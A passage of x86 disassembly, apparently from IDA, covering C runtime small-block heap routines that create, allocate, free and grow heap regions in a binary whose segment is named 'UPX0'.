loc_41DDA1: ; CODE XREF: sub_41DC8A+107j push 0Ah push ebx push eax call sub_41BBA6 add esp, 0Ch cmp eax, 2 jz short loc_41DDCF cmp eax, 3 jz short loc_41DDCF cmp eax, 1 jz short loc_41DDCF loc_41DDBC: ; CODE XREF: sub_41DC8A+5Cj ; sub_41DC8A+F2j ... lea eax, [ebp+var_4] push eax call sub_41DC5D cmp [ebp+var_4], 6 pop ecx sbb eax, eax add eax, 3 loc_41DDCF: ; CODE XREF: sub_41DC8A+3Ej ; sub_41DC8A+126j ... pop ebx leave retn sub_41DC8A endp ; =============== S U B R O U T I N E ======================================= sub_41DDD2 proc near ; CODE XREF: UPX0:0041D98Dp arg_0 = dword ptr 4 xor eax, eax push 0 cmp [esp+4+arg_0], eax push 1000h setz al push eax call dword_4271BC ; HeapCreate test eax, eax mov ds:dword_4DCFE4, eax jz short loc_41DE28 call sub_41DC8A cmp eax, 3 mov ds:dword_4DCFE8, eax jnz short loc_41DE0E push 3F8h call sub_41DE2F pop ecx jmp short loc_41DE18 ; --------------------------------------------------------------------------- loc_41DE0E: ; CODE XREF: sub_41DDD2+2Dj cmp eax, 2 jnz short loc_41DE2B call sub_41E976 loc_41DE18: ; CODE XREF: sub_41DDD2+3Aj test eax, eax jnz short loc_41DE2B push ds:dword_4DCFE4 call dword_4271B8 ; HeapDestroy loc_41DE28: ; CODE XREF: sub_41DDD2+1Ej xor eax, eax retn ; --------------------------------------------------------------------------- loc_41DE2B: ; CODE XREF: sub_41DDD2+3Fj ; sub_41DDD2+48j push 1 pop eax retn sub_41DDD2 endp ; =============== S U B R O U T I N E ======================================= sub_41DE2F proc near ; CODE XREF: sub_41DDD2+34p arg_0 = dword ptr 4 push 140h push 0 push ds:dword_4DCFE4 call dword_427144 ; RtlAllocateHeap test eax, eax mov ds:dword_4DCFDC, eax jnz short loc_41DE4C retn ; --------------------------------------------------------------------------- loc_41DE4C: ; CODE XREF: sub_41DE2F+1Aj mov ecx, [esp+arg_0] and ds:dword_4DCFD4, 0 and ds:dword_4DCFD8, 0 push 1 mov ds:dword_4DCFD0, eax mov ds:dword_4DCFE0, ecx mov ds:dword_4DCFC8, 10h pop eax retn sub_41DE2F endp ; =============== S U B R O U T I N E ======================================= sub_41DE77 proc near ; CODE XREF: sub_41B0B1+17p ; sub_41B202+4Cp ... arg_0 = dword ptr 4 mov eax, ds:dword_4DCFD8 lea ecx, [eax+eax*4] mov eax, ds:dword_4DCFDC lea ecx, [eax+ecx*4] loc_41DE87: ; CODE XREF: sub_41DE77+26j cmp eax, ecx jnb short loc_41DE9F mov edx, [esp+arg_0] sub edx, [eax+0Ch] cmp edx, 100000h jb short locret_41DEA1 add eax, 14h jmp short loc_41DE87 ; --------------------------------------------------------------------------- loc_41DE9F: ; CODE XREF: sub_41DE77+12j xor eax, eax locret_41DEA1: ; CODE XREF: sub_41DE77+21j retn sub_41DE77 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41DEA2 proc near ; CODE XREF: sub_41B0B1+23p ; sub_41B202+A4p ... var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp sub esp, 10h mov ecx, [ebp+arg_0] push ebx push esi mov esi, [ebp+arg_4] mov eax, [ecx+10h] push edi mov edi, esi add esi, 0FFFFFFFCh sub edi, [ecx+0Ch] shr edi, 0Fh mov ecx, edi imul ecx, 204h lea ecx, [ecx+eax+144h] mov [ebp+var_10], ecx mov ecx, [esi] dec ecx test cl, 1 mov [ebp+var_4], ecx jnz loc_41E1C6 mov edx, [ecx+esi] lea ebx, [ecx+esi] mov [ebp+var_C], edx mov edx, [esi-4] mov [ebp+var_8], edx mov edx, [ebp+var_C] test dl, 1 mov [ebp+arg_4], ebx jnz short loc_41DF78 sar edx, 4 dec edx cmp edx, 3Fh jbe short loc_41DF06 push 3Fh pop edx loc_41DF06: ; CODE XREF: sub_41DEA2+5Fj mov ecx, [ebx+4] cmp ecx, [ebx+8] jnz short loc_41DF5A cmp edx, 20h jnb short loc_41DF31 mov ebx, 80000000h mov ecx, edx shr ebx, cl lea ecx, [edx+eax+4] not ebx and [eax+edi*4+44h], ebx dec byte ptr [ecx] jnz short loc_41DF52 mov ecx, [ebp+arg_0] and [ecx], ebx jmp short loc_41DF52 ; --------------------------------------------------------------------------- loc_41DF31: ; CODE XREF: sub_41DEA2+6Fj lea ecx, [edx-20h] mov ebx, 80000000h shr ebx, cl lea ecx, [edx+eax+4] not ebx and [eax+edi*4+0C4h], ebx dec byte ptr [ecx] jnz short loc_41DF52 mov ecx, [ebp+arg_0] and [ecx+4], ebx loc_41DF52: ; CODE XREF: sub_41DEA2+86j ; sub_41DEA2+8Dj ... mov ecx, [ebp+var_4] mov ebx, [ebp+arg_4] jmp short loc_41DF5D ; --------------------------------------------------------------------------- loc_41DF5A: ; CODE XREF: sub_41DEA2+6Aj mov ecx, [ebp+var_4] loc_41DF5D: ; CODE XREF: sub_41DEA2+B6j mov edx, [ebx+8] mov ebx, [ebx+4] add ecx, [ebp+var_C] mov [edx+4], ebx mov edx, [ebp+arg_4] mov [ebp+var_4], ecx mov ebx, [edx+4] mov edx, [edx+8] mov [ebx+8], edx loc_41DF78: ; CODE XREF: sub_41DEA2+56j mov edx, ecx sar edx, 4 dec edx cmp edx, 3Fh jbe short loc_41DF86 push 3Fh pop edx loc_41DF86: ; CODE XREF: sub_41DEA2+DFj mov ebx, [ebp+var_8] and ebx, 1 mov [ebp+var_C], ebx jnz loc_41E029 sub esi, [ebp+var_8] mov ebx, [ebp+var_8] sar ebx, 4 push 3Fh mov [ebp+arg_4], esi dec ebx pop esi cmp ebx, esi jbe short loc_41DFAB mov ebx, esi loc_41DFAB: ; CODE XREF: sub_41DEA2+105j add ecx, [ebp+var_8] mov edx, ecx mov [ebp+var_4], ecx sar edx, 4 dec edx cmp edx, esi jbe short loc_41DFBD mov edx, esi loc_41DFBD: ; CODE XREF: sub_41DEA2+117j cmp ebx, edx jz short loc_41E024 mov ecx, [ebp+arg_4] mov esi, [ecx+4] cmp esi, [ecx+8] jnz short loc_41E00C cmp ebx, 20h jnb short loc_41DFED mov esi, 80000000h mov ecx, ebx shr esi, cl not esi and [eax+edi*4+44h], esi dec byte ptr [ebx+eax+4] jnz short loc_41E00C mov ecx, [ebp+arg_0] and [ecx], esi jmp short loc_41E00C ; --------------------------------------------------------------------------- loc_41DFED: ; CODE XREF: sub_41DEA2+12Dj lea ecx, [ebx-20h] mov esi, 80000000h shr esi, cl not esi and [eax+edi*4+0C4h], esi dec byte ptr [ebx+eax+4] jnz short loc_41E00C mov ecx, [ebp+arg_0] and [ecx+4], esi loc_41E00C: ; CODE XREF: sub_41DEA2+128j ; sub_41DEA2+142j ... mov ecx, [ebp+arg_4] mov esi, [ecx+8] mov ecx, [ecx+4] mov [esi+4], ecx mov ecx, [ebp+arg_4] mov esi, [ecx+4] mov ecx, [ecx+8] mov [esi+8], ecx loc_41E024: ; CODE XREF: sub_41DEA2+11Dj mov esi, [ebp+arg_4] jmp short loc_41E02C ; --------------------------------------------------------------------------- loc_41E029: ; CODE XREF: sub_41DEA2+EDj mov ebx, [ebp+arg_0] loc_41E02C: ; CODE XREF: sub_41DEA2+185j cmp [ebp+var_C], 0 jnz short loc_41E03A cmp ebx, edx jz loc_41E0BB loc_41E03A: ; CODE XREF: sub_41DEA2+18Ej mov ecx, [ebp+var_10] mov ebx, [ecx+edx*8+4] lea ecx, [ecx+edx*8] mov [esi+4], ebx mov [esi+8], ecx mov [ecx+4], esi mov ecx, [esi+4] mov [ecx+8], esi mov ecx, [esi+4] cmp ecx, [esi+8] jnz short loc_41E0BB mov cl, [edx+eax+4] cmp edx, 20h mov byte ptr [ebp+arg_4+3], cl inc cl mov [edx+eax+4], cl jnb short loc_41E092 cmp byte ptr [ebp+arg_4+3], 0 jnz short loc_41E081 mov ebx, 80000000h mov ecx, edx shr ebx, cl mov ecx, [ebp+arg_0] or [ecx], ebx loc_41E081: ; CODE XREF: sub_41DEA2+1CFj mov ebx, 80000000h mov ecx, edx shr ebx, cl lea eax, [eax+edi*4+44h] or [eax], ebx jmp short loc_41E0BB ; --------------------------------------------------------------------------- loc_41E092: ; CODE XREF: sub_41DEA2+1C9j cmp byte ptr [ebp+arg_4+3], 0 jnz short loc_41E0A8 lea ecx, [edx-20h] mov ebx, 80000000h shr ebx, cl mov ecx, [ebp+arg_0] or [ecx+4], ebx loc_41E0A8: ; CODE XREF: sub_41DEA2+1F4j lea ecx, [edx-20h] mov edx, 80000000h shr edx, cl lea eax, [eax+edi*4+0C4h] or [eax], edx loc_41E0BB: ; CODE XREF: sub_41DEA2+192j ; sub_41DEA2+1B7j ... mov eax, [ebp+var_4] mov [esi], eax mov [eax+esi-4], eax mov eax, [ebp+var_10] dec dword ptr [eax] jnz loc_41E1C6 mov eax, ds:dword_4DCFD4 test eax, eax jz loc_41E1B8 mov ecx, ds:dword_4DCFCC mov esi, dword_4271C0 shl ecx, 0Fh add ecx, [eax+0Ch] mov ebx, 8000h push 4000h push ebx push ecx call esi ; VirtualFree mov ecx, ds:dword_4DCFCC mov eax, ds:dword_4DCFD4 mov edx, 80000000h shr edx, cl or [eax+8], edx mov eax, ds:dword_4DCFD4 mov ecx, ds:dword_4DCFCC mov eax, [eax+10h] and dword ptr [eax+ecx*4+0C4h], 0 mov eax, ds:dword_4DCFD4 mov eax, [eax+10h] dec byte ptr [eax+43h] mov eax, ds:dword_4DCFD4 mov ecx, [eax+10h] cmp byte ptr [ecx+43h], 0 jnz short loc_41E149 and dword ptr [eax+4], 0FFFFFFFEh mov eax, ds:dword_4DCFD4 loc_41E149: ; CODE XREF: sub_41DEA2+29Cj cmp dword ptr [eax+8], 0FFFFFFFFh jnz short loc_41E1B8 push ebx push 0 push dword ptr [eax+0Ch] call esi ; VirtualFree mov eax, ds:dword_4DCFD4 push dword ptr [eax+10h] push 0 push ds:dword_4DCFE4 call dword_427140 ; RtlFreeHeap mov eax, ds:dword_4DCFD8 mov edx, ds:dword_4DCFDC lea eax, [eax+eax*4] shl eax, 2 mov ecx, eax mov eax, ds:dword_4DCFD4 sub ecx, eax lea ecx, [ecx+edx-14h] push ecx lea ecx, [eax+14h] push ecx push eax call sub_41CC90 mov eax, [ebp+arg_0] add esp, 0Ch dec ds:dword_4DCFD8 cmp eax, ds:dword_4DCFD4 jbe short loc_41E1AE sub [ebp+arg_0], 14h loc_41E1AE: ; CODE XREF: sub_41DEA2+306j mov eax, ds:dword_4DCFDC mov ds:dword_4DCFD0, eax loc_41E1B8: ; CODE XREF: sub_41DEA2+234j ; sub_41DEA2+2ABj mov eax, [ebp+arg_0] mov ds:dword_4DCFCC, edi mov ds:dword_4DCFD4, eax loc_41E1C6: ; CODE XREF: sub_41DEA2+38j ; sub_41DEA2+227j pop edi pop esi pop ebx leave retn sub_41DEA2 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41E1CB proc near ; CODE XREF: sub_41B202+77p ; sub_41B513+18p ... var_14 = dword ptr -14h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 14h mov eax, ds:dword_4DCFD8 mov edx, ds:dword_4DCFDC push ebx push esi lea eax, [eax+eax*4] push edi lea edi, [edx+eax*4] mov eax, [ebp+arg_0] mov [ebp+var_4], edi lea ecx, [eax+17h] and ecx, 0FFFFFFF0h mov [ebp+var_10], ecx sar ecx, 4 dec ecx cmp ecx, 20h jge short loc_41E20B or esi, 0FFFFFFFFh shr esi, cl or [ebp+var_8], 0FFFFFFFFh mov [ebp+var_C], esi jmp short loc_41E21B ; --------------------------------------------------------------------------- loc_41E20B: ; CODE XREF: sub_41E1CB+30j add ecx, 0FFFFFFE0h or eax, 0FFFFFFFFh xor esi, esi shr eax, cl mov [ebp+var_C], esi mov [ebp+var_8], eax loc_41E21B: ; CODE XREF: sub_41E1CB+3Ej mov eax, ds:dword_4DCFD0 mov ebx, eax cmp ebx, edi mov [ebp+arg_0], ebx jnb short loc_41E242 loc_41E229: ; CODE XREF: sub_41E1CB+75j mov ecx, [ebx+4] mov edi, [ebx] and ecx, [ebp+var_8] and edi, esi or ecx, edi jnz short loc_41E242 add ebx, 14h cmp ebx, [ebp+var_4] mov [ebp+arg_0], ebx jb short loc_41E229 loc_41E242: ; CODE XREF: sub_41E1CB+5Cj ; sub_41E1CB+6Aj cmp ebx, [ebp+var_4] jnz short loc_41E2C0 mov ebx, edx loc_41E249: ; CODE XREF: sub_41E1CB+96j cmp ebx, eax mov [ebp+arg_0], ebx jnb short loc_41E265 mov ecx, [ebx+4] mov edi, [ebx] and ecx, [ebp+var_8] and edi, esi or ecx, edi jnz short loc_41E263 add ebx, 14h jmp short loc_41E249 ; --------------------------------------------------------------------------- loc_41E263: ; CODE XREF: sub_41E1CB+91j cmp ebx, eax loc_41E265: ; CODE XREF: sub_41E1CB+83j jnz short loc_41E2C0 loc_41E267: ; CODE XREF: sub_41E1CB+ADj cmp ebx, [ebp+var_4] jnb short loc_41E27D cmp dword ptr [ebx+8], 0 jnz short loc_41E27A add ebx, 14h mov [ebp+arg_0], ebx jmp short loc_41E267 ; --------------------------------------------------------------------------- loc_41E27A: ; CODE XREF: sub_41E1CB+A5j cmp ebx, [ebp+var_4] loc_41E27D: ; CODE XREF: sub_41E1CB+9Fj jnz short loc_41E2A5 mov ebx, edx loc_41E281: ; CODE XREF: sub_41E1CB+C6j cmp ebx, eax mov [ebp+arg_0], ebx jnb short loc_41E295 cmp dword ptr [ebx+8], 0 jnz short loc_41E293 add ebx, 14h jmp short loc_41E281 ; --------------------------------------------------------------------------- loc_41E293: ; CODE XREF: sub_41E1CB+C1j cmp ebx, eax loc_41E295: ; CODE XREF: sub_41E1CB+BBj jnz short loc_41E2A5 call sub_41E4D4 mov ebx, eax test ebx, ebx mov [ebp+arg_0], ebx jz short loc_41E2B9 loc_41E2A5: ; CODE XREF: sub_41E1CB:loc_41E27Dj ; sub_41E1CB:loc_41E295j push ebx call sub_41E585 pop ecx mov ecx, [ebx+10h] mov [ecx], eax mov eax, [ebx+10h] cmp dword ptr [eax], 0FFFFFFFFh jnz short loc_41E2C0 loc_41E2B9: ; CODE XREF: sub_41E1CB+D8j xor eax, eax jmp loc_41E4CF ; --------------------------------------------------------------------------- loc_41E2C0: ; CODE XREF: sub_41E1CB+7Aj ; sub_41E1CB:loc_41E265j ... mov ds:dword_4DCFD0, ebx mov eax, [ebx+10h] mov edx, [eax] cmp edx, 0FFFFFFFFh mov [ebp+var_4], edx jz short loc_41E2E7 mov ecx, [eax+edx*4+0C4h] mov edi, [eax+edx*4+44h] and ecx, [ebp+var_8] and edi, esi or ecx, edi jnz short loc_41E31E loc_41E2E7: ; CODE XREF: sub_41E1CB+106j mov edx, [eax+0C4h] mov esi, [eax+44h] and edx, [ebp+var_8] and esi, [ebp+var_C] and [ebp+var_4], 0 lea ecx, [eax+44h] or edx, esi mov esi, [ebp+var_C] jnz short loc_41E31B loc_41E304: ; CODE XREF: sub_41E1CB+14Ej mov edx, [ecx+84h] inc [ebp+var_4] and edx, [ebp+var_8] add ecx, 4 mov edi, esi and edi, [ecx] or edx, edi jz short loc_41E304 loc_41E31B: ; CODE XREF: sub_41E1CB+137j mov edx, [ebp+var_4] loc_41E31E: ; CODE XREF: sub_41E1CB+11Aj mov ecx, edx xor edi, edi imul ecx, 204h lea ecx, [ecx+eax+144h] mov [ebp+var_C], ecx mov ecx, [eax+edx*4+44h] and ecx, esi jnz short loc_41E347 mov ecx, [eax+edx*4+0C4h] push 20h and ecx, [ebp+var_8] pop edi loc_41E347: ; CODE XREF: sub_41E1CB+16Dj ; sub_41E1CB+183j test ecx, ecx jl short loc_41E350 shl ecx, 1 inc edi jmp short loc_41E347 ; --------------------------------------------------------------------------- loc_41E350: ; CODE XREF: sub_41E1CB+17Ej mov ecx, [ebp+var_C] mov edx, [ecx+edi*8+4] mov ecx, [edx] sub ecx, [ebp+var_10] mov esi, ecx mov [ebp+var_8], ecx sar esi, 4 dec esi cmp esi, 3Fh jle short loc_41E36D push 3Fh pop esi loc_41E36D: ; CODE XREF: sub_41E1CB+19Dj cmp esi, edi jz loc_41E482 mov ecx, [edx+4] cmp ecx, [edx+8] jnz short loc_41E3DE cmp edi, 20h jge short loc_41E3AD mov ebx, 80000000h mov ecx, edi shr ebx, cl mov ecx, [ebp+var_4] lea edi, [eax+edi+4] not ebx mov [ebp+var_14], ebx and ebx, [eax+ecx*4+44h] mov [eax+ecx*4+44h], ebx dec byte ptr [edi] jnz short loc_41E3DB mov ebx, [ebp+arg_0] mov ecx, [ebp+var_14] and [ebx], ecx jmp short loc_41E3DE ; --------------------------------------------------------------------------- loc_41E3AD: ; CODE XREF: sub_41E1CB+1B5j lea ecx, [edi-20h] mov ebx, 80000000h shr ebx, cl mov ecx, [ebp+var_4] lea edi, [eax+edi+4] lea ecx, [eax+ecx*4+0C4h] not ebx and [ecx], ebx dec byte ptr [edi] mov [ebp+var_14], ebx jnz short loc_41E3DB mov ebx, [ebp+arg_0] mov ecx, [ebp+var_14] and [ebx+4], ecx jmp short loc_41E3DE ; --------------------------------------------------------------------------- loc_41E3DB: ; CODE XREF: sub_41E1CB+1D6j ; sub_41E1CB+203j mov ebx, [ebp+arg_0] loc_41E3DE: ; CODE XREF: sub_41E1CB+1B0j ; sub_41E1CB+1E0j ... mov ecx, [edx+8] mov edi, [edx+4] cmp [ebp+var_8], 0 mov [ecx+4], edi mov ecx, [edx+4] mov edi, [edx+8] mov [ecx+8], edi jz loc_41E48E mov ecx, [ebp+var_C] mov edi, [ecx+esi*8+4] lea ecx, [ecx+esi*8] mov [edx+4], edi mov [edx+8], ecx mov [ecx+4], edx mov ecx, [edx+4] mov [ecx+8], edx mov ecx, [edx+4] cmp ecx, [edx+8] jnz short loc_41E47F mov cl, [esi+eax+4] cmp esi, 20h mov byte ptr [ebp+arg_0+3], cl jge short loc_41E450 inc cl cmp byte ptr [ebp+arg_0+3], 0 mov [esi+eax+4], cl jnz short loc_41E43E mov edi, 80000000h mov ecx, esi shr edi, cl or [ebx], edi loc_41E43E: ; CODE XREF: sub_41E1CB+266j mov edi, 80000000h mov ecx, esi shr edi, cl mov ecx, [ebp+var_4] or [eax+ecx*4+44h], edi jmp short loc_41E47F ; --------------------------------------------------------------------------- loc_41E450: ; CODE XREF: sub_41E1CB+25Aj inc cl cmp byte ptr [ebp+arg_0+3], 0 mov [esi+eax+4], cl jnz short loc_41E469 lea ecx, [esi-20h] mov edi, 80000000h shr edi, cl or [ebx+4], edi loc_41E469: ; CODE XREF: sub_41E1CB+28Fj mov ecx, [ebp+var_4] lea edi, [eax+ecx*4+0C4h] lea ecx, [esi-20h] mov esi, 80000000h shr esi, cl or [edi], esi loc_41E47F: ; CODE XREF: sub_41E1CB+24Ej ; sub_41E1CB+283j mov ecx, [ebp+var_8] loc_41E482: ; CODE XREF: sub_41E1CB+1A4j test ecx, ecx jz short loc_41E491 mov [edx], ecx mov [ecx+edx-4], ecx jmp short loc_41E491 ; --------------------------------------------------------------------------- loc_41E48E: ; CODE XREF: sub_41E1CB+229j mov ecx, [ebp+var_8] loc_41E491: ; CODE XREF: sub_41E1CB+2B9j ; sub_41E1CB+2C1j mov esi, [ebp+var_10] add edx, ecx lea ecx, [esi+1] mov [edx], ecx mov [edx+esi-4], ecx mov esi, [ebp+var_C] mov ecx, [esi] test ecx, ecx lea edi, [ecx+1] mov [esi], edi jnz short loc_41E4C7 cmp ebx, ds:dword_4DCFD4 jnz short loc_41E4C7 mov ecx, [ebp+var_4] cmp ecx, ds:dword_4DCFCC jnz short loc_41E4C7 and ds:dword_4DCFD4, 0 loc_41E4C7: ; CODE XREF: sub_41E1CB+2E0j ; sub_41E1CB+2E8j ... mov ecx, [ebp+var_4] mov [eax], ecx lea eax, [edx+4] loc_41E4CF: ; CODE XREF: sub_41E1CB+F0j pop edi pop esi pop ebx leave retn sub_41E1CB endp ; =============== S U B R O U T I N E ======================================= sub_41E4D4 proc near ; CODE XREF: sub_41E1CB+CCp mov eax, ds:dword_4DCFD8 mov ecx, ds:dword_4DCFC8 push esi push edi xor edi, edi cmp eax, ecx jnz short loc_41E517 lea eax, [ecx+ecx*4+50h] shl eax, 2 push eax push ds:dword_4DCFDC push edi push ds:dword_4DCFE4 call dword_427198 ; RtlReAllocateHeap cmp eax, edi jz short loc_41E567 add ds:dword_4DCFC8, 10h mov ds:dword_4DCFDC, eax mov eax, ds:dword_4DCFD8 loc_41E517: ; CODE XREF: sub_41E4D4+11j mov ecx, ds:dword_4DCFDC push 41C4h push 8 lea eax, [eax+eax*4] push ds:dword_4DCFE4 lea esi, [ecx+eax*4] call dword_427144 ; RtlAllocateHeap cmp eax, edi mov [esi+10h], eax jz short loc_41E567 push 4 push 2000h push 100000h push edi call dword_4271C4 ; VirtualAlloc cmp eax, edi mov [esi+0Ch], eax jnz short loc_41E56B push dword ptr [esi+10h] push edi push ds:dword_4DCFE4 call dword_427140 ; RtlFreeHeap loc_41E567: ; CODE XREF: sub_41E4D4+30j ; sub_41E4D4+67j xor eax, eax jmp short loc_41E582 ; --------------------------------------------------------------------------- loc_41E56B: ; CODE XREF: sub_41E4D4+81j or dword ptr [esi+8], 0FFFFFFFFh mov [esi], edi mov [esi+4], edi inc ds:dword_4DCFD8 mov eax, [esi+10h] or dword ptr [eax], 0FFFFFFFFh mov eax, esi loc_41E582: ; CODE XREF: sub_41E4D4+95j pop edi pop esi retn sub_41E4D4 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41E585 proc near ; CODE XREF: sub_41E1CB+DBp var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp push ecx mov ecx, [ebp+arg_0] push ebx push esi push edi mov esi, [ecx+10h] mov eax, [ecx+8] xor ebx, ebx loc_41E597: ; CODE XREF: sub_41E585+19j test eax, eax jl short loc_41E5A0 shl eax, 1 inc ebx jmp short loc_41E597 ; --------------------------------------------------------------------------- loc_41E5A0: ; CODE XREF: sub_41E585+14j mov eax, ebx push 3Fh imul eax, 204h pop edx lea eax, [eax+esi+144h] mov [ebp+var_4], eax loc_41E5B5: ; CODE XREF: sub_41E585+3Aj mov [eax+8], eax mov [eax+4], eax add eax, 8 dec edx jnz short loc_41E5B5 mov edi, ebx push 4 shl edi, 0Fh add edi, [ecx+0Ch] push 1000h push 8000h push edi call dword_4271C4 ; VirtualAlloc test eax, eax jnz short loc_41E5E8 or eax, 0FFFFFFFFh jmp loc_41E67B ; --------------------------------------------------------------------------- loc_41E5E8: ; CODE XREF: sub_41E585+59j lea edx, [edi+7000h] cmp edi, edx ja short loc_41E62E lea eax, [edi+10h] loc_41E5F5: ; CODE XREF: sub_41E585+A7j or dword ptr [eax-8], 0FFFFFFFFh or dword ptr [eax+0FECh], 0FFFFFFFFh lea ecx, [eax+0FFCh] mov dword ptr [eax-4], 0FF0h mov [eax], ecx lea ecx, [eax-1004h] mov [eax+4], ecx mov dword ptr [eax+0FE8h], 0FF0h add eax, 1000h lea ecx, [eax-10h] cmp ecx, edx jbe short loc_41E5F5 loc_41E62E: ; CODE XREF: sub_41E585+6Bj mov eax, [ebp+var_4] lea ecx, [edi+0Ch] add eax, 1F8h push 1 pop edi mov [eax+4], ecx mov [ecx+8], eax lea ecx, [edx+0Ch] mov [eax+8], ecx mov [ecx+4], eax and dword ptr [esi+ebx*4+44h], 0 mov [esi+ebx*4+0C4h], edi mov al, [esi+43h] mov cl, al inc cl test al, al mov eax, [ebp+arg_0] mov [esi+43h], cl jnz short loc_41E66B or [eax+4], edi loc_41E66B: ; CODE XREF: sub_41E585+E1j mov edx, 80000000h mov ecx, ebx shr edx, cl not edx and [eax+8], edx mov eax, ebx loc_41E67B: ; CODE XREF: sub_41E585+5Ej pop edi pop esi pop ebx leave retn sub_41E585 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41E680 proc near ; CODE XREF: sub_41B202+6Ap var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp sub esp, 0Ch mov ecx, [ebp+arg_0] mov eax, [ebp+arg_8] push ebx push esi push edi mov edi, [ebp+arg_4] mov edx, edi lea esi, [eax+17h] sub edx, [ecx+0Ch] mov eax, [ecx+10h] and esi, 0FFFFFFF0h shr edx, 0Fh mov ecx, edx imul ecx, 204h lea ecx, [ecx+eax+144h] mov [ebp+var_C], ecx mov ecx, [edi-4] dec ecx cmp esi, ecx mov [ebp+arg_8], ecx mov ebx, [ecx+edi-4] lea edi, [ecx+edi-4] mov [ebp+var_4], ebx jle loc_41E82E test bl, 1 jnz loc_41E827 add ebx, ecx cmp esi, ebx jg loc_41E827 mov ecx, [ebp+var_4] sar ecx, 4 dec ecx cmp ecx, 3Fh mov [ebp+var_8], ecx jbe short loc_41E6F7 push 3Fh pop ecx mov [ebp+var_8], ecx loc_41E6F7: ; CODE XREF: sub_41E680+6Fj mov ebx, [edi+4] cmp ebx, [edi+8] jnz short loc_41E747 cmp ecx, 20h jnb short loc_41E723 mov ebx, 80000000h shr ebx, cl mov ecx, [ebp+var_8] lea ecx, [ecx+eax+4] not ebx and [eax+edx*4+44h], ebx dec byte ptr [ecx] jnz short loc_41E747 mov ecx, [ebp+arg_0] and [ecx], ebx jmp short loc_41E747 ; --------------------------------------------------------------------------- loc_41E723: ; CODE XREF: sub_41E680+82j add ecx, 0FFFFFFE0h mov ebx, 80000000h shr ebx, cl mov ecx, [ebp+var_8] lea ecx, [ecx+eax+4] not ebx and [eax+edx*4+0C4h], ebx dec byte ptr [ecx] jnz short loc_41E747 mov ecx, [ebp+arg_0] and [ecx+4], ebx loc_41E747: ; CODE XREF: sub_41E680+7Dj ; sub_41E680+9Aj ... mov ecx, [edi+8] mov ebx, [edi+4] mov [ecx+4], ebx mov ecx, [edi+4] mov edi, [edi+8] mov [ecx+8], edi mov ecx, [ebp+arg_8] sub ecx, esi add [ebp+var_4], ecx cmp [ebp+var_4], 0 jle loc_41E815 mov edi, [ebp+var_4] mov ecx, [ebp+arg_4] sar edi, 4 dec edi lea ecx, [ecx+esi-4] cmp edi, 3Fh jbe short loc_41E781 push 3Fh pop edi loc_41E781: ; CODE XREF: sub_41E680+FCj mov ebx, [ebp+var_C] lea ebx, [ebx+edi*8] mov [ebp+arg_8], ebx mov ebx, [ebx+4] mov [ecx+4], ebx mov ebx, [ebp+arg_8] mov [ecx+8], ebx mov [ebx+4], ecx mov ebx, [ecx+4] mov [ebx+8], ecx mov ebx, [ecx+4] cmp ebx, [ecx+8] jnz short loc_41E803 mov cl, [edi+eax+4] cmp edi, 20h mov byte ptr [ebp+arg_8+3], cl inc cl mov [edi+eax+4], cl jnb short loc_41E7DA cmp byte ptr [ebp+arg_8+3], 0 jnz short loc_41E7CD mov ebx, 80000000h mov ecx, edi shr ebx, cl mov ecx, [ebp+arg_0] or [ecx], ebx loc_41E7CD: ; CODE XREF: sub_41E680+13Dj lea eax, [eax+edx*4+44h] mov edx, 80000000h mov ecx, edi jmp short loc_41E7FF ; --------------------------------------------------------------------------- loc_41E7DA: ; CODE XREF: sub_41E680+137j cmp byte ptr [ebp+arg_8+3], 0 jnz short loc_41E7F0 lea ecx, [edi-20h] mov ebx, 80000000h shr ebx, cl mov ecx, [ebp+arg_0] or [ecx+4], ebx loc_41E7F0: ; CODE XREF: sub_41E680+15Ej lea eax, [eax+edx*4+0C4h] lea ecx, [edi-20h] mov edx, 80000000h loc_41E7FF: ; CODE XREF: sub_41E680+158j shr edx, cl or [eax], edx loc_41E803: ; CODE XREF: sub_41E680+125j mov edx, [ebp+arg_4] mov ecx, [ebp+var_4] lea eax, [edx+esi-4] mov [eax], ecx mov [ecx+eax-4], ecx jmp short loc_41E818 ; --------------------------------------------------------------------------- loc_41E815: ; CODE XREF: sub_41E680+E5j mov edx, [ebp+arg_4] loc_41E818: ; CODE XREF: sub_41E680+193j lea eax, [esi+1] mov [edx-4], eax mov [edx+esi-8], eax jmp loc_41E96E ; --------------------------------------------------------------------------- loc_41E827: ; CODE XREF: sub_41E680+52j ; sub_41E680+5Cj xor eax, eax jmp loc_41E971 ; --------------------------------------------------------------------------- loc_41E82E: ; CODE XREF: sub_41E680+49j jge loc_41E96E mov ebx, [ebp+arg_4] sub [ebp+arg_8], esi lea ecx, [esi+1] mov [ebx-4], ecx lea ebx, [ebx+esi-4] mov esi, [ebp+arg_8] mov [ebp+arg_4], ebx sar esi, 4 dec esi mov [ebx-4], ecx cmp esi, 3Fh jbe short loc_41E859 push 3Fh pop esi loc_41E859: ; CODE XREF: sub_41E680+1D4j test byte ptr [ebp+var_4], 1 jnz loc_41E8E8 mov esi, [ebp+var_4] sar esi, 4 dec esi cmp esi, 3Fh jbe short loc_41E872 push 3Fh pop esi loc_41E872: ; CODE XREF: sub_41E680+1EDj mov ecx, [edi+4] cmp ecx, [edi+8] jnz short loc_41E8C1 cmp esi, 20h jnb short loc_41E89D mov ebx, 80000000h mov ecx, esi shr ebx, cl lea esi, [esi+eax+4] not ebx and [eax+edx*4+44h], ebx dec byte ptr [esi] jnz short loc_41E8BE mov ecx, [ebp+arg_0] and [ecx], ebx jmp short loc_41E8BE ; --------------------------------------------------------------------------- loc_41E89D: ; CODE XREF: sub_41E680+1FDj lea ecx, [esi-20h] mov ebx, 80000000h shr ebx, cl lea ecx, [esi+eax+4] not ebx and [eax+edx*4+0C4h], ebx 